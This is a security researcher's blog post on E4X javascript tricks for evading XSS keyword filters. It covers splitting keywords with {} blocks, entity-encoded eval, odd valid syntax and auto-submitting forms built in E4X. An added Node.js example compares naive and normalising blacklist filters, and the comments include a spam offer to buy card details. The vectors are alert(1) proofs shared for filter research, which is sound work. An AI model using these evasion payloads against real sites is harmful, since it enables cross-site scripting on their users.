E4X for hackers

If you’ve not been following my sla.ckers thread on unusual javascript then you’re missing out. The idea was to gather interesting, weird and wonderful javascript tricks that are useful for filter evasion and coding. I investigated E4X quite a lot for this purpose and found a few cool things that I’ll share with you.

Using {} for keyword evasion

Let’s say a filter disallows certain words. E4X’s {} syntax evaluates a javascript block inside XML data and inserts its string value, so if the block evaluates to a blank string you can use it to split up a disallowed keyword. The Array constructor creates an empty array, and when an empty array is converted to a string (as happens in concatenation) the result is a blank string.

location=javascr{new Array}ipt:aler{new Array}t(1)

Another example:-

location=javascr{[]}ipt:aler{[]}t(1)

A few more:-

<>{new String};
<>{''};
<>{new RegExp()[-1]};
<>{<>};

Weird syntax fun

E4X also adds syntax that would normally be a parsing error in plain javascript but is perfectly valid once E4X is enabled.

default xml namespace = alert(1) 

Some more weird looking stuff:-

<>{eval(/alert(1)/[-1])}..@*::xyz
 (!1..@*::abc?alert:1..@*::xyz)(1)

Numbers as E4X

For some reason E4X lets you apply its XML operators to plain number literals, so a number can be used as if it were XML:

1..@Numbers/(are=1)%1..*::xml 

Encoding with entities

Giorgio brought this to my attention when he was hacking my unsuccessful Firefox sandbox experiment. You can use html entities inside XML data and they are decoded when the XML data is converted to a string.

alert(<>")

A more interesting example with decimal entities:-

eval(<>alert(1)+[])

Hackvertor supports morphs which allow you to generate this sort of data automatically, useful for fuzzing XSS filters:-
E4X morph
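The two evasion tricks above (splitting a keyword with {} blocks that evaluate to a blank string, and hiding a keyword behind html entities inside XML data) both work because the E4X engine transforms the text before it is ever used as a string, while a keyword filter looks at the raw text. The following is an added example and not code from the original post or from Hackvertor: a small Node.js script that applies a keyword blacklist to the raw payload and then to the same payload after undoing those two transformations. The two {} vectors are the post’s own; the entity-encoded input, the blocked word list and the helper names (decodeEntities, stripE4XBlocks, naiveFilter, normalisedFilter) are constructed for this example.

```javascript
// Added example (not from the original post): keyword matching on the raw
// text versus keyword matching after E4X-aware normalisation.

// Named entities the decoder understands; numeric forms (&#NN; and &#xHH;)
// are handled generically. This list is an assumption for the example.
const NAMED_ENTITIES = { quot: '"', apos: "'", lt: '<', gt: '>', amp: '&' };

// Decode html entities the way E4X does when XML text is coerced to a string.
// Unknown named entities are left untouched.
function decodeEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#\d+|[a-z]+);/gi, (m, body) => {
    if (body[0] === '#') {
      const cp = body[1].toLowerCase() === 'x'
        ? parseInt(body.slice(2), 16)
        : parseInt(body.slice(1), 10);
      return Number.isFinite(cp) ? String.fromCodePoint(cp) : m;
    }
    const named = NAMED_ENTITIES[body.toLowerCase()];
    return named !== undefined ? named : m;
  });
}

// Remove every {...} expression block (innermost first, so nesting works)
// and the XMLList delimiters <> and </>. This is deliberately pessimistic:
// the filter assumes any block could evaluate to the empty string rather
// than trying to evaluate javascript.
function stripE4XBlocks(s) {
  let prev;
  do {
    prev = s;
    s = s.replace(/\{[^{}]*\}/g, '');
  } while (s !== prev);
  return s.replace(/<\/?>/g, '');
}

// Constructed blacklist for the demonstration.
const BLOCKED = ['javascript', 'alert', 'eval'];

// The kind of filter the post is evading: substring match on raw text.
function naiveFilter(payload) {
  const lower = payload.toLowerCase();
  return BLOCKED.some(word => lower.includes(word));
}

// Same blacklist, applied after undoing the two E4X transformations.
// Blocks are stripped before entities are decoded, because an entity that
// decodes to "{" is literal text in E4X, not an expression block.
function normalisedFilter(payload) {
  const normalised = decodeEntities(stripE4XBlocks(payload)).toLowerCase();
  return BLOCKED.some(word => normalised.includes(word));
}

// Side-by-side results for the post's vectors plus a constructed
// entity-encoded one and a benign URL.
function demo() {
  const samples = [
    'javascr{new Array}ipt:aler{new Array}t(1)',          // from the post
    'javascr{[]}ipt:aler{[]}t(1)',                        // from the post
    '<>&#97;&#108;&#101;&#114;&#116;(1)</>',              // constructed
    'http://example.com/page?q=1',                        // constructed, benign
  ];
  return samples.map(p => ({
    payload: p,
    naive: naiveFilter(p),
    normalised: normalisedFilter(p),
  }));
}

console.table(demo());
```

The normalisation is the important part for a defender: a filter that matches before undoing what the runtime will do to the input is matching the wrong string. Even normalised, this is still a blacklist; the post’s other sections show E4X syntax that a plain javascript tokenizer cannot even parse, which is why context-aware output encoding is the control to rely on and keyword matching at best a secondary signal.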

Form creation

Making forms with E4X is lovely, check it out:-

f=<form/>;                 // an empty <form/> element as an E4X XML object
f.@id='x';                 // @name reads or writes an attribute
f.@action='url.php';
f.@method='post';
f.input.@name='h';         // setting an attribute on a missing child creates <input/>
f.input.@value=1;
document.body.innerHTML=f; // the XML object is serialised to markup
document.getElementById('x').submit();

5 Responses to “E4X for hackers”

  1. mark writes:

    i saw ur site and am wondering if u $ crcd details i got paypal let me know

  2. Gareth Heyes writes:

    @mark

    wot r u talkin bout? nvr mind i’m not intrsd

  3. Nonove writes:

    Hi, Gareth Heyes
    I just wanna know how to test or use these weird vectors.
    Thanks!

  4. Gareth Heyes writes:

    @Nonove

    I’ll be releasing a javascript hacking video shortly

  5. Nonove writes:

    Thanks Heyes!